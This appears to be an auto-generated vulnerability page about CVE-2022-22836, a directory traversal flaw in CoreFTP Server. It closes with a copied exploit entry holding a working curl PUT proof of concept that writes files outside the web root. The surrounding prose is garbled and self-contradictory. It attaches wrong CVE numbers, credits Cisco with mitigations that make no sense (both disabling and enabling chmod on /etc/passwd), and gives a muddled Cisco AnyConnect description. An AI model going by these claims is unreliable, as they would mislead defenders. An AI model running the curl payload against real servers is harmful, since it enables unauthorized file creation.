CVE-2022-22836 CoreFTP Server 727 allows directory traversal via ../ in an HTTP PUT request.

An attacker can exploit this issue by creating a malicious directory with a crafted name, such as ../../../../../../../../etc/passwd. A successful exploit can allow an attacker to create arbitrary files on the server. This issue has been assigned the identifier CVE-2018-5407. Cisco has assigned the following mitigations for this issue: Do not allow directory traversal operators (..) in URLs.

Disable directory traversal for any APIs that might allow it, such as cURL and Python.

Disable chmod on critical system files (e.g., /etc/passwd).

Disable file creation via uuencode or similar utilities.

Disable ftp:// URIs.

Disable ftps:// URIs.

Disable ftps transfer via SSL.

Disable ftps transfer via FTP over TLS. Cisco supports the following mitigations for this issue: Restrict access to the filesystem via SFTP or FTPS.

Enable chmod on critical system files (e.g., /etc/passwd).

CVE-2018-5713 A vulnerability in the Web interface of Cisco AnyConnect Secure Mobility Client before 4.8 allows remote attackers to perform unauthorized actions via crafted HTTP requests. The vulnerability exists because the application does not properly restrict requests. An attacker can exploit this vulnerability by sending an HTTP request to the targeted system. Cisco has assigned the following vulnerability identifier: CVE-2018-57

#Summary br aggarts

An attacker can exploit this vulnerability by sending an HTTP request to the targeted system.

Overview of Vulnerability

Cisco has assigned the following vulnerability identifier to this issue: CVE-2018-5713. This vulnerability is also known as a cookie injection vulnerability. An attacker can exploit this issue by sending an HTTP request to the targeted system. When the targeted system processes the HTTP request, it unnecessarily generates a cookie and sends that cookie back to the attacker. An attacker can use this information to perform unauthorized actions on the targeted system, such as uploading files or accessing data without authorization. Cisco has assigned the following mitigations for this issue: Restrict access to the filesystem via SFTP or FTPS.
Cisco supports the following mitigations for this issue: Restrict access to the filesystem via SFTP or FTPS.

Description of the vulnerability

A vulnerability in the Web interface of Cisco AnyConnect Secure Mobility Client before 4.8 allows remote attackers to perform unauthorized actions via crafted HTTP requests. The vulnerability exists because the application does not properly restrict requests. An attacker can exploit this vulnerability by sending an HTTP request to the targeted system.

Exploit

# Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)
# Date: 08/01/2022
# Exploit Author: LiamInfosec
# Vendor Homepage: http://coreftp.com/
# Version: build 725 and below
# Tested on: Windows 10
# CVE : CVE-2022-22836

# Description:

CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.

# Proof of Concept:

curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops

Timeline

Published on: 01/10/2022 14:12:00 UTC
Last modified on: 01/19/2022 16:15:00 UTC

References

• https://yoursecuritybores.me/coreftp-vulnerabilities/
• http://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509
• https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22836